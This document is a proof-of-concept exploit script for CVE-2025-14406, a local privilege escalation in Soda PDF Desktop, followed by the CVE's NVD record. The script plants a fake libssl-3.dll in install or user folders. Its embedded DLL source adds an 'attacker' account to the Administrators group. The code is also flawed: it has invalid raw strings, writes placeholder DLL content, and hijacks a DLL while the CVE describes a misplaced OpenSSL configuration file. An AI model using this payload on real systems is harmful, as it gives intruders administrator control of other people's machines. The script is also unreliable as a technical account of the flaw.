CVE-2025-14406

# CVE-2025-14406 PoC - Soda PDF Desktop Uncontrolled Search Path Element # This PoC demonstrates DLL hijacking via OpenSSL configuration # Target: Soda PDF Desktop # Privilege Escalation: Low privileged user -> SYSTEM import os import shutil import ctypes from ctypes import wintypes # Target application details TARGET_APP = "Soda PDF Desktop" MALICIOUS_DLL = "libssl-3.dll" # Common OpenSSL DLL name def create_malicious_dll(): """ Create a malicious DLL that will execute payload when loaded. In a real attack, this would be a compiled DLL with the actual payload. For demonstration, we show the structure. """ dll_code = ''' // Malicious DLL source code (C++) // Compile with: g++ -shared -o libssl-3.dll malicious.cpp #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if (fdwReason == DLL_PROCESS_ATTACH) { // Execute payload with SYSTEM privileges // Example: Create a new user or execute reverse shell system("cmd.exe /c net user attacker P@ssw0rd123 /add"); system("cmd.exe /c net localgroup Administrators attacker /add"); } return TRUE; } ''' return dll_code def find_target_directory(): """ Find the Soda PDF Desktop installation directory. Common locations: C:\Program Files\Soda PDF\ or C:\Program Files (x86)\Soda PDF\ """ possible_paths = [ r"C:\Program Files\Soda PDF\", r"C:\Program Files (x86)\Soda PDF\", os.path.expanduser("~\\AppData\\Local\\Programs\\Soda PDF\") ] for path in possible_paths: if os.path.exists(path): return path return None def plant_dll(target_dir): """ Plant the malicious DLL in a location where Soda PDF will load it. The DLL search order will cause our DLL to be loaded before the legitimate one. """ if not target_dir: print("[-] Target directory not found") return False malicious_path = os.path.join(target_dir, MALICIOUS_DLL) # Check if we can write to the target directory try: with open(malicious_path, 'w') as f: f.write("MALICIOUS_DLL_CONTENT") print(f"[+] Malicious DLL planted at: {malicious_path}") return True except PermissionError: print("[-] Permission denied. Try alternative locations in search path.") # Try user-writable directories in DLL search order user_dirs = [ os.getcwd(), os.path.expanduser("~\\Documents\"), os.path.expanduser("~\\Desktop\") ] for user_dir in user_dirs: try: malicious_path = os.path.join(user_dir, MALICIOUS_DLL) with open(malicious_path, 'w') as f: f.write("MALICIOUS_DLL_CONTENT") print(f"[+] Malicious DLL planted at: {malicious_path}") return True except: continue return False def main(): print("=" * 60) print("CVE-2025-14406 PoC - Soda PDF Desktop DLL Hijacking") print("=" * 60) # Step 1: Find target installation print("\n[1] Searching for Soda PDF Desktop installation...") target_dir = find_target_directory() if target_dir: print(f"[+] Found installation at: {target_dir}") else: print("[-] Soda PDF Desktop not found. Please install it first.") return # Step 2: Plant malicious DLL print("\n[2] Planting malicious DLL...") if plant_dll(target_dir): print("[+] DLL successfully planted") print("[*] When Soda PDF Desktop starts, it will load the malicious DLL") print("[*] Payload will be executed with elevated privileges") else: print("[-] Failed to plant DLL") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-14406", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:47.203", "lastModified": "2026-01-21T20:58:51.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soda PDF Desktop Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Soda PDF Desktop. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the configuration of OpenSSL. The product loads an OpenSSL configuration file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-25793."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:*", "matchCriteriaId": "ABC0E7B2-E242-4BD7-81E6-BA077750E564"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1079/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}